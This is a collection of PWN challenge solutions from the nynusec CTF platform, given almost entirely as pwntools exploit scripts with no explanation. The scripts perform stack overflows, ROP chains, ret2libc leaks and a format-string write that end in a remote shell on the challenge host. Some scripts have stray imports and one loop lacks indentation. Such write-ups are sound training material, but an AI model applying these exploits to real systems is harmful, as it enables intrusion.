nynusec平台全WriteUp(PWN)

Hello_Pwn

nc直接链接即可

hello_pwn2

from pwn import *

#start
r = remote("ctf.nynusec.com",28944)

#params

#attack
payload = b'M'*4 + p64(0x6E756161)
r.sendline(payload)

r.interactive()

pwnpwn

from pwn import *

#start
r = remote("ctf.nynusec.com",28928)

#params
backdoor = 0x400596

#attack
payload = b'M'*0x88 + p64(backdoor)
r.recv()
r.sendline(payload)

r.interactive()

easyStack

from turtle import back
from pwn import *

#start
r = remote("ctf.nynusec.com",28599)

#params
elf = ELF("easyStack")
backdoor = elf.symbols['fun']

#attack
payload = b'M'*0x18 + p64(backdoor)
r.recv()
r.sendline(payload)


r.interactive()

rop_test

from pwn import *

#start
r = remote("ctf.nynusec.com",28686)
elf =ELF("rop_test")

#params
system_addr = elf.symbols['system']
bin_sh_addr = 0x804A024

#attack
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.recv()
r.sendline(payload)

r.interactive()

pwn_string

from pwn import *

#start
r = remote("ctf.nynusec.com",28836)
context(log_level = 'debug', arch = 'amd64', os = 'linux')

#params

#attack
r.recvuntil('secret[0] is ')
addr = int(r.recvuntil('\n'), 16)
payload = '%85d%7$n'
r.sendlineafter('be:', 'aaa')
r.sendlineafter('up?:', 'east')
r.sendlineafter('leave(0)?:', '1')
r.sendlineafter("address'", str(addr))
r.sendlineafter('is:', payload)
shellcode = asm(shellcraft.sh())
r.sendlineafter('SPELL', shellcode)

r.interactive()

pwn_guess

from pwn import *

#start
r=remote("ctf.nynusec.com",28690)

#params

#attack
payload = b'M'*0x20 + p64(1)
r.recvuntil("name:")
r.sendline(payload)

rand = [2,5,4,2,6,2,5,1,4,2]
# r.recv()
for i in range(10):
r.sendlineafter("Please input your guess number:",str(rand[i]))

r.interactive()

pwn_int

from pwn import *

#start
r = remote("ctf.nynusec.com",28599)

#params
backdoor = 0x804868B

#attack
r.recv()
r.sendline("1")
r.recv()
r.sendline("m0sway")
r.recv()
payload = b'M'*(0x14+4) + p32(backdoor)
payload = payload.ljust(259, b'M')
r.sendline(payload)

r.interactive()

S2-stack

from matplotlib import interactive
from pwn import *

#start
r = remote("ctf.nynusec.com",28052)

#params
backdoor = 0x804850F

#attack
payload = b'M'*(9+4) + p32(backdoor)
r.recv()
r.sendline(payload)

r.interactive()

S2-pwn1-rop

from pwn import *

#start
r = remote("ctf.nynusec.com",28482)
elf = ELF("S2-pwn1-rop")

#params
rdi_addr = 0x400683
bin_sh_addr = 0x601048
system_addr = elf.plt['system']

#attack
payload = b'M'*(0x10+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline(payload)

r.interactive()

S2-pwn2-libc-rop

from pwn import *
from LibcSearcher import *

#start
r = remote("ctf.nynusec.com",28455)
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("PWN_libc")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83
main_addr = elf.symbols['main']
ret=0x4006b9

#attack
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))

# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system")       #system 偏移
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh")   #/bin/sh 偏移

#attack2
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(ret) +p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)

r.interactive()

libcc

from pwn import *

#start
# r = process("level3")
r = remote("ctf.nynusec.com",28249)
elf =ELF("level3")
libc = ELF("libc6-i386_2.23-0ubuntu11.3_amd64.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter(b"Input:\n",payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter(b"Input:\n",payload)

r.interactive()

PWN-libc

from git import base
from pwn import *
from LibcSearcher import *

#start
# r = process("PWN_libc")
# r = remote("node4.buuoj.cn",28654)
r = remote("ctf.nynusec.com",28654)
lib = ELF("libc.23.so")
elf = ELF("PWN_libc")

#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83
main_addr = elf.symbols['main']
# ret=0x4006b9

#attack
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))

# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b"/bin/sh"))
one_gadget_addr = 0x45216 + base_addr
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system")       #system 偏移
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh")   #/bin/sh 偏移

#attack2
payload2 = b'\x00' + b'M'*(0x50+8-1)  + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)

r.interactive()